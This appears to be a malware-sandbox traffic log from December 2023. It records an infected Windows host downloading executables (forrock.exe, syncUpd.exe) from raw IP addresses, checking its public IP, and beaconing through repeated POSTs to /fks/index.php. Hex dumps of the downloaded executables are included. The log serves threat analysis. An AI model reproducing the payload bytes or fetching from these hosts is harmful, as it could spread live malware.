f0 bf 81 65 18 30 92 4d fd 61 05 e2 37 36 e8 a6 d0 de 0e e8 a2 a9 3a 7c ab 40 5a 31 b9 89 fd fb a7 be 0f 74 7f fd eb 7e f6 da 8f 3d 2a 59 dc 6c 0a 6d 83 fd 76 97 fa fc fc 7e 05 26 81 85 a8 f4 c3 83 8a b3 18 a5 97 a5 14 c6 ad af 4e 1f 40 63 c6 16 3c c8 39 25 0d 5e 16 a6 9f 75 23 61 18 14 f3 08 9d 05 cc 79 bc af a8 16 b7 89 19 52 21 a0 4d d0 e5 96 a3 e2 d1 08 8f 7e f5 28 c3 48 16 d3 60 71 9d ff 68 1e 05 ad eb a9 16 cb 4d c7 ed 6c 7c af 0c 67 0b bd 01 01 b2 ea c1 42 63 b0 75 1f 3d c3 e7 b1 43 47 10 61 74 5f c6 64 d1 9d 25 d1 15 77 56 9f 52 45 b2 5e 80 d7 77 16 d7 a6 f4 05 61 2b 77 05 5b ad e1 d1 e6 6e 60 df 55 b6 48 39 06 Data Ascii: 1fa8}_\|Qcl<nEq]^8{fH9ZBL31l;:yIuM5yf7a$w77-rfN!<{Muc=T!o@QCF@3sPu-\T+b1$A/}t<KL<Qrk5c@]Vq_e"/svaaAJ,t{p7xhw-SiRg:u jLF>~\|At@meF#Y>5&+ {>{r\|L`U:IO!%LQ2u6xQyGSC@7$lRN9LFtp>caoun)d!b~(OYD6Hv}_k;]t-n 5$p<?C3YF w0+.2u0Jkrs+ mBz]zpfW%^4QyHO&mc+Js<HGmvY:F'pLB+tT&'<%YEnI8_F5PF#Z@t=XNuJhy.hjin]asjuhE.rUH\|E`v9'UrU8M><4G:2oN`UUu]}a;J+g[Fe0Ma76:\|@Z1t~=Ylmv~&N@c<9%^u#ayR!M~(H`qhMl\|gBcu=CGat_d%wVRE^wa+w[n`UH9
Dec 27, 2023 17:57:55.091221094 CET	286	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bwsifhwgqmvbnk.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 283 Host: 185.215.113.68
Dec 27, 2023 17:57:55.388158083 CET	538	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:57:55 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Dec 27, 2023 17:57:55.446974993 CET	287	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jpvbnqvnqsvwlvb.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 320 Host: 185.215.113.68
Dec 27, 2023 17:57:55.743812084 CET	1286	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:57:55 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 66 61 38 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 31 32 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 b4 e4 1e f1 71 b5 c9 bc 04 15 e7 71 ea fd 5e 47 9c 85 0a b5 90 0a 31 46 20 71 e6 60 28 43 15 b9 5b b0 be 11 c5 a2 b5 e9 95 49 96 7d 37 66 91 a5 18 ad 84 96 10 82 8f 87 f9 a1 70 1c 4e 1a b3 0d 8e e5 c9 cb 67 a6 38 01 e8 2c ca 4d c0 d4 6f 76 bf 44 f4 ca 7e 45 bf a3 f1 d7 ed 21 9f 72 57 44 6e 22 a6 24 4a 80 44 61 18 51 62 0c 6b 86 35 f0 e8 1b 7f 1f c4 d0 63 1a f8 bc 40 de dc fb 5d 56 bf e2 a7 ca 76 82 ed b9 0b 55 ad 7d ef 4a 94 8d 8b 73 9a cc 96 61 e4 97 cc c0 6f c9 41 d1 4b 2c ff 65 77 97 a3 a6 7b b2 fb 23 f5 92 37 df ad 86 78 58 91 77 1f b9 6d 53 69 d2 52 67 3a 87 75 20 6c f8 4c 46 f2 f8 3e 7e e2 a9 f3 b6 7c 90 41 c0 c6 a4 48 e5 bf eb 87 b0 6d 45 84 46 28 a2 19 bf 35 26 0f 18 c2 3b fd 11 df 00 1b bd 33 e6 3e 06 7b 72 f6 1d 12 7c 1b 4c 9b 83 c3 e9 aa 60 d1 08 b0 cc c9 e8 99 75 84 3a a6 59 4b 89 4f 23 25 db db 1c 4c 13 b7 f6 51 cc 1b 32 f0 75 a1 93 f1 ba 18 3f 6f cd 63 43 79 fe be f6 e0 47 f8 fc 0a 53 e2 33 df 87 b4 a7 d4 86 da c0 40 c7 37 18 24 6c 52 c2 4e 14 c6 39 4c b9 4d e8 7b 76 24 25 fd 99 78 70 3e 94 63 61 6a c2 75 5c fc 29 1a 3c d8 10 64 b9 90 fc d7 21 ce fd f8 62 7e 28 0f fa ad 1b ac 44 36 09 bc dc 08 48 d6 b8 13 a6 78 91 7d 02 8b 4f 69 3b 0e 94 03 b9 4a 4f 16 74 f9 ca 9e d2 be be 2c 6e 60 43 02 8d e7 24 bd 70 53 3e 3f 25 bc 6a ad ad cf bc a1 33 31 e7 df 1a 17 69 da db 96 84 46 a1 ff 94 21 86 aa d2 c7 86 e5 9c 77 30 96 2b a3 d7 a3 0b 2e 92 ca 56 7b 78 c5 89 8c 89 fd 15 73 30 50 76 6b 72 f2 4f 9d 0c 68 67 0f 20 2c 44 fd 7a 5c 7a 07 d0 70 af 67 57 ac f4 d1 13 e3 c1 3e 7b f5 8d b7 0f 1c 31 51 79 48 6d bd 11 0f f0 4b d8 2c 05 6a 63 2d 39 71 99 a4 b7 19 19 0d c9 9c 0f 20 17 13 05 68 ef 37 e1 e8 ca fa 61 f4 6c 46 27 f5 ee d7 70 4b cd 15 e5 44 93 3b e6 2d 7b 54 f6 05 dd 07 c1 b5 26 c8 c9 55 c5 c2 7c 55 27 43 6e d4 43 8e 3f 9d c1 55 a7 63 15 47 dc e9 ce 6a 22 e9 23 f1 72 92 a2 85 5a 8e 68 ac 74 3d 52 ec 50 f6 ab 8d 68 1b 73 0b f9 ef 2e ce c2 6e 6a 69 64 75 66 03 e2 79 35 4f b0 fc 54 10 68 35 d2 94 0e f1 95 fb 95 14 ad 81 c0 bc cd 2e 78 6a da 4e 54 ff e7 0c 48 8c ff 17 cf 06 ec 1b 78 f9 bf 40 83 0e ff e2 ef 86 60 76 a1 2a 1d c1 2c 55 72 92 92 c4 55 af 0b 39 db cb 5e cd 95 e4 f7 a1 b9 fa c0 8c e1 bf 3e 38 a8 32 47 b8 30 21 aa 6f 05 79 5f 0f ef 6a 55 0a 5f b0 c7 ee 75 9a f8 b9 5d 7d 6b 46 4b 82 2b ea dd 61 a8 5a 12 03 10 34 db 94 f0 cf f3 b4 19 30 e2 33 fb 61 05 e8 1f 31 e8 a6 da b1 03 e8 a2 a3 29 75 ba 49 63 2c b9 89 fd fb d5 5d 0e 74 0f 8f ee 7c f6 aa f1 3b 2a 59 d6 44 0d 6d 83 f7 65 9f fa c4 bd 7e 05 26 81 94 ad 86 cc 81 8a c3 6a c4 96 a5 64 b8 ab af 4e 15 68 64 c6 16 36 a7 34 25 0d 54 2c b7 9f 75 23 70 1e 6f f2 08 9d 01 e4 b1 bd af ae 2e bb 89 19 52 30 a6 36 d1 e5 96 a7 ca 16 09 8f 78 e6 20 c3 59 1e fb 6e 71 9d f5 7e e0 04 be e1 b8 1c f2 6d 96 64 89 2f e9 52 fa 21 be 8a 44 b0 38 07 a3 98 40 e6 f0 63 86 09 4a f7 47 1a 70 8b a3 6e 0e c3 9d 25 1a e7 09 a1 71 99 98 af cc 68 9d 81 c5 20 7a 1d 18 3d 24 bf d7 9b 53 1d 29 6b 88 66 da 8d f0 c0 2a 0b Data Ascii: 1fa8}_\|Qcl<nEq]^8{fH9ZBL121l;:yIuM5yf7a$w77-rqq^G1F q`(C[I}7fpNg8,MovD~E!rWDn"$JDaQbk5c@]VvU}JsaoAK,ew{#7xXwmSiRg:u lLF>~\|AHmEF(5&;3>{r\|L`u:YKO#%LQ2u?ocCyGS3@7$lRN9LM{v$%xp>caju\)<d!b~(D6Hx}Oi;JOt,n`C$pS>?%j31iF!w0+.V{xs0PvkrOhg ,Dz\zpgW>{1QyHmK,jc-9q h7alF'pKD;-{T&U\|U'CnC?UcGj"#rZht=RPhs.njidufy5OTh5.xjNTHx@`v,UrU9^>82G0!oy_jU_u]}kFK+aZ403a1)uIc,]t\|;YDme~&jdNhd64%T,u#po.R06x Ynq~md/R!D8@cJGpn%qh z=$S)kf*
Dec 27, 2023 17:57:56.377588034 CET	283	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gmvvtofexru.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 133 Host: 185.215.113.68
Dec 27, 2023 17:57:56.674323082 CET	538	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:57:56 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	5.42.65.125	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:57:23.285512924 CET	160	OUT	GET /forrock.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 5.42.65.125
Dec 27, 2023 17:57:23.530349970 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:57:23 GMT Content-Type: application/octet-stream Content-Length: 19755520 Last-Modified: Sun, 24 Dec 2023 05:03:49 GMT Connection: keep-alive ETag: "6587bbb5-12d7200" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b5 bb 87 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 68 2d 01 00 08 00 00 00 00 00 00 2e 86 2d 01 00 20 00 00 00 a0 2d 01 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 2d 01 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d8 85 2d 01 53 00 00 00 00 a0 2d 01 d8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2d 01 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 66 2d 01 00 20 00 00 00 68 2d 01 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d8 04 00 00 00 a0 2d 01 00 06 00 00 00 6a 2d 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 2d 01 00 02 00 00 00 70 2d 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 86 2d 01 00 00 00 00 48 00 00 00 02 00 05 00 24 70 2d 01 b4 15 00 00 03 00 00 00 01 00 00 06 30 28 00 00 f2 47 2d 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 5f 01 00 00 01 00 00 11 7e 03 00 00 04 2c 0d 28 11 00 00 06 2c 06 16 28 0d 00 00 0a 7e 04 00 00 04 2c 0d 28 13 00 00 06 2c 06 16 28 0d 00 00 0a 7e 05 00 00 04 2c 0d 28 15 00 00 06 2c 06 16 28 0d 00 00 0a 7e 06 00 00 04 2c 0d 28 16 00 00 06 2c 06 16 28 0d 00 00 0a 7e 01 00 00 04 2c 10 7e 02 00 00 04 20 e8 03 00 00 5a 28 0e 00 00 0a 7e 07 00 00 04 2c 11 72 01 00 00 70 72 01 00 00 70 16 28 09 00 00 06 26 16 0a 38 c2 00 00 00 7e 0c 00 00 04 06 6f 0f 00 00 0a 0b 7e 0d 00 00 04 06 6f 0f 00 00 0a 0c 7e 0e 00 00 04 06 6f 0f 00 00 0a 0d 7e 0f 00 00 04 06 6f 0f 00 00 0a 13 04 07 28 08 00 00 06 13 05 7e 0a 00 00 04 2c 09 11 05 28 02 00 00 06 13 05 7e 09 00 00 04 72 03 00 00 70 28 10 00 00 0a 2c 1a 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 11 05 28 04 00 00 06 13 05 2b 29 7e 09 00 00 04 72 31 00 00 70 28 10 00 00 0a 2c 18 11 05 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 28 03 00 00 06 13 05 11 04 07 08 28 13 00 00 0a 28 14 00 00 0a 13 06 11 05 11 06 28 0d 00 00 06 11 06 09 28 0f 00 00 06 06 17 58 0a 06 7e 0c 00 00 04 6f 15 00 00 0a 3f 2e ff ff ff 7e 08 00 00 04 26 2a 00 1b 30 02 00 2f 00 00 00 02 00 00 11 02 73 16 00 00 0a 0a 73 17 00 00 0a 0b 06 16 73 18 00 00 0a 0c 08 07 6f 19 00 00 0a de 0a 08 2c 06 08 6f 1a 00 00 0a dc 07 6f 1b 00 00 0a 2a Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELeh-.- -@ -@-S-- H.text4f- h- `.rsrc-j-@@.reloc-p-@B-H$p-0(G-0_~,(,(~,(,(~,(,(~,(,(~,~ Z(~,rprp(&8~o~o~o~o(~,(~rp(,(rpo(+)~r1p(,(rpo(((((X~o?.~&0/ssso,oo
Dec 27, 2023 17:57:23.530427933 CET	1286	IN	Data Raw: 00 01 10 00 00 02 00 15 00 09 1e 00 0a 00 00 00 00 13 30 06 00 28 00 00 00 03 00 00 11 02 8e 69 8d 1a 00 00 01 0a 16 0b 2b 13 06 07 02 07 91 03 07 03 8e 69 5d 91 61 d2 9c 07 17 58 0b 07 02 8e 69 32 e7 06 2a 36 02 03 28 06 00 00 06 28 01 00 00 2b Data Ascii: 0(i+i]aXi26((+0c (~-s~(+(++ i]XX _(X 2(!*0w{X _}
Dec 27, 2023 17:57:23.530442953 CET	1286	IN	Data Raw: 70 6f 46 00 00 0a 2d 1c 08 72 23 02 00 70 6f 42 00 00 0a 6f 43 00 00 0a 72 4d 02 00 70 28 10 00 00 0a 2c 05 17 13 04 de 34 11 05 6f 47 00 00 0a 3a 7a ff ff ff de 0c 11 05 2c 07 11 05 6f 1a 00 00 0a dc de 0a 07 2c 06 07 6f 1a 00 00 0a dc de 0a 06 Data Ascii: poF-r#poBoCrMp(,4oG:z,o,o,o(0rcp((I,0(JoK(&*06(L(M(
Dec 27, 2023 17:57:23.530457020 CET	1286	IN	Data Raw: c0 5d 74 1e 74 12 77 00 00 22 02 6f 00 67 a0 28 00 72 04 33 00 67 3e 31 00 6b 00 77 00 69 00 63 00 6f 00 67 00 2a 00 72 c0 1d 72 14 72 10 00 6b 00 9f 07 26 00 63 b0 2d 00 67 28 6b 00 72 42 71 00 67 00 73 00 6b 00 77 00 69 00 63 00 2f 00 67 40 6a Data Ascii: ]ttw"og(r3g>1kwicog*rrrk&c-g(krBqgskwic/g@jr3gskwicogjr3gskwicogjr3gskwicogjr3gskwicogjr3gskwicogjr3gskwicogjr3gskwicogjr3g
Dec 27, 2023 17:57:23.530472040 CET	1286	IN	Data Raw: 27 4a 00 67 33 aa 33 84 39 46 0c 68 95 b3 3b ad 75 6a e8 d1 1c 63 00 a8 00 71 00 6a 00 24 56 65 56 31 e8 56 1c 6b 00 f4 c4 7d 83 ab ff 84 38 8f 41 49 00 72 50 65 e8 35 24 73 00 32 59 fe 75 95 ff 16 14 90 75 77 ff 1f 0c 9a 27 10 00 67 50 8c 55 63 Data Ascii: 'Jg339Fh;ujcqj$VeV1Vk}8AIrPe5$s2Yuuw'gPUcE3g6RiPDjP$$gYUEcPuzhA;'b>27cuch;)D/2.'jiE,@jUc]UEPuf[E,@sbs]
Dec 27, 2023 17:57:23.530492067 CET	1286	IN	Data Raw: 68 58 73 33 00 83 86 8a ff 96 83 a7 18 ec f8 99 75 21 e8 c0 17 33 00 e4 38 51 75 00 e8 df 17 69 00 ea 38 84 62 ec 18 3d 56 1a 3f 40 40 67 e8 2e fd 94 ff 44 c9 ea c4 7b 66 e6 4c 19 fe e9 f8 8c 75 2a 83 1a 10 8c 75 70 e8 0b 17 69 00 e0 38 4d 75 52 Data Ascii: hXs3u!38Qui8b=V?@@g.D{fLu*upi8MuRr,@P)P\dFUdkw"icS<S4Sd3_)[4:usu{/2usubhs]Uukuyuoh2
Dec 27, 2023 17:57:23.530509949 CET	1286	IN	Data Raw: 68 98 1c 2f 00 8f 44 1c 00 72 83 f7 24 c4 00 43 82 6b 5e b4 8b 96 55 e8 ec ec 3d 5b 53 e8 00 73 75 36 e8 17 7e 73 00 94 75 7f e8 fe 7c 63 00 07 ff 67 00 6a e8 dd fc cc ff 3e 59 2e c3 d3 4d 2d 00 69 66 5a 05 6f 00 27 00 1f 36 d3 3c 33 40 67 81 cb Data Ascii: h/Dr$Ck^U=[Ssu6~su\|cgj>Y.M-ifZo'6<3@gk@wP,cuJlj9g@su\|ti@cTSshDj;hh33EP5M=sfRw)8<g@j3@gP6kuPbc9j@ru*ts@kZZ'e~u3C:
Dec 27, 2023 17:57:23.530569077 CET	1286	IN	Data Raw: 60 43 fd a4 8b b2 c3 e0 ff 22 8b 85 8b 26 08 ec 00 63 8b 6a 8b 32 fc 6e c3 ec ff 26 8b 87 8b 32 08 ea 00 67 8b 6f 66 ec 40 96 5d b1 8b cc 55 ec ec f2 ec 13 02 77 00 c8 08 53 82 6f 33 a2 89 2f fc 21 8b 6e 0c 31 8b 06 08 58 c0 20 8b 14 14 9c 75 7f Data Ascii: `C"&cj2n&2gof@]UwSo3/!n1X u5!3gsk3P9P3Pkjkt}pms-7u7VgY D3tw
Dec 27, 2023 17:57:23.530585051 CET	1286	IN	Data Raw: ff ae 85 ab fd 90 ff 66 00 6a 00 9b 7f 37 00 67 83 9b 58 64 84 ad 02 69 00 2b 48 1b 79 4c c1 65 84 55 ff cc ff 2f 48 7c 85 f5 04 77 00 ea c7 67 f7 ea f0 9a ff 95 10 7a 00 33 89 da dc 8e ff 94 74 47 0f de 47 9f 50 07 00 65 00 6a 8d f7 f4 ce ff 98 Data Ascii: fj7gXdi+HyLeU/H\|wgz3tGGPejP9ozt,wip(jw5csl\;H7;tGko+gj3jc07k.
Dec 27, 2023 17:57:23.530597925 CET	1286	IN	Data Raw: fd 8d ff 13 c7 e2 d0 8e ff 94 01 77 00 69 8b fe cc 92 ff 98 2b f7 e0 8f ff cc 2b fa d0 8e ff 94 f6 f2 f0 94 ff 9c 0c 1a 17 98 b5 de fd 8d ff be 85 bf fd 8c ff 38 6a 57 e8 ec c9 63 00 ec c4 6b ff df d0 8f ff cc 8b da b4 8e ff 94 8d f2 d8 94 ff 9c Data Ascii: wi++8jWck3Ynu`W`jW*ckfb\|mPEP5P-jiuB9tS'g0us
Dec 27, 2023 17:57:23.774918079 CET	1286	IN	Data Raw: 8d 32 e0 39 53 8b ef 81 ff 98 59 33 8b b4 5e 68 c9 a4 8b 8c 55 e0 ec 88 75 79 6a 63 ff 1a 0c 98 75 62 e8 1f ff cc ff e4 c4 63 5d a8 8b 88 55 e2 ec e0 ec 4f 56 54 f6 53 75 7e 75 2e e8 0d fe 8c ff 3d 56 21 56 3f c7 63 16 6f 00 67 e8 bd fd 8d ff b0 Data Ascii: 29SY3^hUuyjcubc]UOVTSu~u.=V!V?cogs'u}&uw/u.5i3u'w^"ubh"s4:u?I@ww]UujkJ@o>#]Uuyuoh 2<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49741	173.231.16.77	80	352	C:\Users\user\AppData\Local\Temp\InstallSetup8.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:57:38.045500994 CET	133	OUT	GET /?format=dfg HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: api.ipify.org Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:57:38.194886923 CET	174	IN	HTTP/1.1 200 OK Server: nginx/1.25.1 Date: Wed, 27 Dec 2023 16:57:38 GMT Content-Type: text/plain Content-Length: 12 Connection: keep-alive Vary: Origin Data Raw: 32 31 32 2e 31 30 32 2e 34 31 2e 32 Data Ascii: 212.102.41.2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49742	91.92.254.7	80	352	C:\Users\user\AppData\Local\Temp\InstallSetup8.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:57:38.591139078 CET	170	OUT	GET /scripts/plus.php?ip=212.102.41.2&substr=eight&s=ab HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: 91.92.254.7 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:57:39.301687956 CET	204	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:38 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49744	5.42.64.35	80	352	C:\Users\user\AppData\Local\Temp\InstallSetup8.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:57:39.599217892 CET	130	OUT	GET /syncUpd.exe HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: 5.42.64.35 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:57:39.841088057 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:39 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Wed, 27 Dec 2023 16:45:01 GMT ETag: "2ce00-60d80852aa67c" Accept-Ranges: bytes Content-Length: 183808 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 c4 6c 00 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 2a 02 00 00 d2 42 00 00 00 00 00 a9 3c 00 00 00 10 00 00 00 40 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 44 00 00 04 00 00 69 05 03 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 6b 02 00 64 00 00 00 00 90 44 00 40 51 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 41 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 5e 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 02 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 